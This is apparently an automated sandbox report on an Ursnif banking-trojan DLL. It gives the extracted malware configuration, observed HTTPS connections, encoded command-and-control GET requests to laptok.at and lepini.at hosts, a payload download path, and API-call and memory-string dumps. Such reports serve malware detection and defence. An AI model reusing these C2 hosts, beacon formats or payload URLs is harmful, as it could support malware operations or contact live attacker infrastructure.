Source: regsvr32.exe.5032.1.memstr |
Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "363", "system": "d18bca24401b3a0555b04f62f946271ehh~", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1613090881", "user": "902d52678695dc15e71ab15cab4ca1f8", "hash": "0xcf6ed071", "soft": "3"} |
Source: 2200.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: unknown |
HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2 |
Source: |
Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp |
Source: |
Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp |
Source: |
Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll |
Source: |
Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp |
Source: |
Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp |
Source: |
Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll |
Source: |
Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp |
Source: |
Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, |
1_2_001F7DD8 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, |
1_2_00B1E0BA |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
1_2_00B2888D |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
1_2_00B34FE1 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B205EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, |
1_2_00B205EF |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at |
Source: Joe Sandbox View |
IP Address: 104.20.185.68 104.20.185.68 |
Source: Joe Sandbox View |
IP Address: 87.248.118.23 87.248.118.23 |
Source: Joe Sandbox View |
JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c |
Source: global traffic |
HTTP traffic detected: GET /api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/DuDF5ppGssBEcEr/QV9fVntnhIoMQikVLO/d6hiSYeOV/4dYFGDJikRkXzxb_2BwW/QFQQ_2FlxfAt2qA9o9g/62AD_2B2fmm2iqEcG6vEpj/wjoFULqIWzBtE/kxblvPrR/0YVugCmN_2Bc2j9hBYYHAx9/MHnpC4iz_2/F5oIRFMeoEacrx2cV/NDVPaDtLYLzj/tmzoxSzXTF9/V0uTtxgzD_2FHy/qFYc0FBl_2Bwgx5A9auDk/zR8Z_2FGrqOtQfFe/ortBJ2feUbdJvQH/rb6hSVK_2BoVNgF7mN/65jgIEhh3/dPvzgP_2ByDfnONu1bga/xxZ9XKj_2/B3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/4ZiHzRCntPm2_2Bs_/2FRsqW01GOmk/jlSxz1SigWt/9VO23wgzmt0z6v/oeSxd8UkQmb8DtzG6cPTd/ym_2By61IoxlQY3M/yETa3aFgtQZDw09/uFg9yjZYa11Lr07gXa/S4TdWO0jq/r61swA9KHU0n7D5WiS6M/aB0_2F0q98FaVumUgko/cxT6YBLiCeGe4HDHV0QwGa/JrNDDK39RFrqA/bnSciaqC/5xKVdu46G4ukxU_2BpjItQZ/vWdcVJKKZr/8uf5Z_2FSSRnkdJI6/EcvRjJAc0DIs/MbGP9aL3I1L/I1KoMe2FXtyIq_/2Fdget5Pj/NB HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler) |
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp |
String found in binary or memory: :2021021220210213: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail) |
Source: msapplication.xml0.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml0.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml5.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml5.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml7.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: msapplication.xml7.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail) |
Source: 85-0f8009-68ddb2ab[1].js.4.dr |
String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter) |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+" Ref 2: "+e.html(t.clientSettings.sid||"000000")+" Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in |